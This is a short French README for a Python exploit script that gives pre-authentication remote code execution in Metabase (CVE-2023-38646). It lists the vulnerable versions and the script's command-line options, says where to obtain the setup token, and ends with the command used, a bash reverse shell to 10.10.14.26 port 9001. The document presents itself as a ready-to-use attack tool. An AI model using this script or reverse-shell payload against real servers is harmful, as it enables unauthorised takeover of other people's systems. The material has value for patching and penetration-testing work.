
Script d'exploitation pour RCE avant authentification dans Metabase (CVE-2023-38646)
Ceci est un script Python qui exploite la vulnérabilité d'exécution de code à distance du logiciel de connexion de Metabase. Il permet d'exécuter des commandes arbitraires sur le serveur avant l'authentification.
Les versions vulnérables sont Metabase open source avant 0.46.6.1 et Metabase Enterprise avant 1.46.6.1
python3 exploit.py -u URL -t TOKEN -c COMMAND
-h, --help show this help message and exit
-u URL, --url URL URL cible
-t TOKEN, --token TOKEN
Jeton d'installation trouvé dans /api/session/properties
-c COMMAND, --command COMMAND
Commande à exécuter sur l'hôte cible

Commande utilisée : bash -i >& /dev/tcp/10.10.14.26/9001 0>&1